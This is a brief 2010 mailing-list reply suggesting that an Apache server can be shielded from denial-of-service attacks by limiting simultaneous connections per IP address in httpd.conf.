VS: Re: how to protect an apache from a DOS Attack

Tatu Salin tatusalin at hotmail.com
Mon Apr 12 19:23:53 UTC 2010

There should be possibility limit connections at the same time. For example you should be able limit conneçtions how many connections can be taken at the same time on that specific web server from same IP-address. There should be sections on httpd.conf file, which you could be used to limit connections to the same web server at the same time. Please check that configuration.